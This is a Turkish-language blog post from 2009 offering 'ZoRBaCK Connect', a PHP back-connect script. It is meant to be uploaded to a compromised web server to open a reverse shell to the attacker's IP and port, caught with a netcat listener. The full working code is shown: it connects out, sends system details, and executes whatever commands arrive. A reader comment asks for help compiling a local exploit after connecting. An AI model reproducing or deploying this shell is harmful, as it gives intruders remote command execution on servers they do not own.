"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

5 Kasım 2009 Perşembe

ZoRBaCK Connect

bildiğiniz gibi bazı serverlarda back connect oldukça zor. bütün serverlar da olmasa da çoğu server da back connect yapmanızı sağlayacak bişeler karaladım...

/*

Edit

kullanımı şöyle bi shell gibi php olarak kaydedip bağlanmak istediğiniz server a atıyosunuz.

örnek: localhost.com/back.php

daha sonra kendi ipinizi ve acık portunuzu shell e yazıp netcat ile bağlanıyorsunuz

*/




/*

coded by ZoRLu

03.11.2009

admin@yildirimordulari.com ( only msn )

z0rlu.blogspot.com

*/

print ( 'ZoRBaCK Connect' );

echo "
ZoRBaCK Connect

Usage: nc -vv -l -p 21





Your IP & Port:










";

$ipim=$_POST['ipim'];
$portum=$_POST['portum'];
if ($ipim <> "")
{
$mucx=fsockopen($ipim , $portum , $errno, $errstr );
if (!$mucx){
$result = "Error: didnt connect !!!";
}
else {

$zamazing0="\n";

fputs ($mucx ,"\nwelcome ZoRBaCK\n\n");
fputs($mucx , system("uname -a") .$zamazing0 );
fputs($mucx , system("pwd") .$zamazing0 );
fputs($mucx , system("id") .$zamazing0.$zamazing0 );
while(!feof($mucx)){
fputs ($mucx);
$one="[$";
$two="]";
$result= fgets ($mucx, 8192);
$message=`$result`;
fputs ($mucx, $one. system("whoami") .$two. " " .$message."\n");
}
fclose ($mucx);
}
}

?>





  • ZoRBaCK Connect 2


  • (i.explorer da kaynağı görüntüleyip kodları alın yada mozilla ile bağlanın ;) )

    1 yorum:

    _efe_ dedi ki...

    SeLamünAleyküm
    Zorlu Kardeşim Bu Nc Olayında Baglanmayı yapıtım fakat cd/dev/shm yada Cd /tmp Cd /var Geçip expolit derlemeye çalıştıgımdaa bu hata (( [$nettoptim] ))geliyor bilgin varsa paylaşman uygunmudur ?

     
    Dizi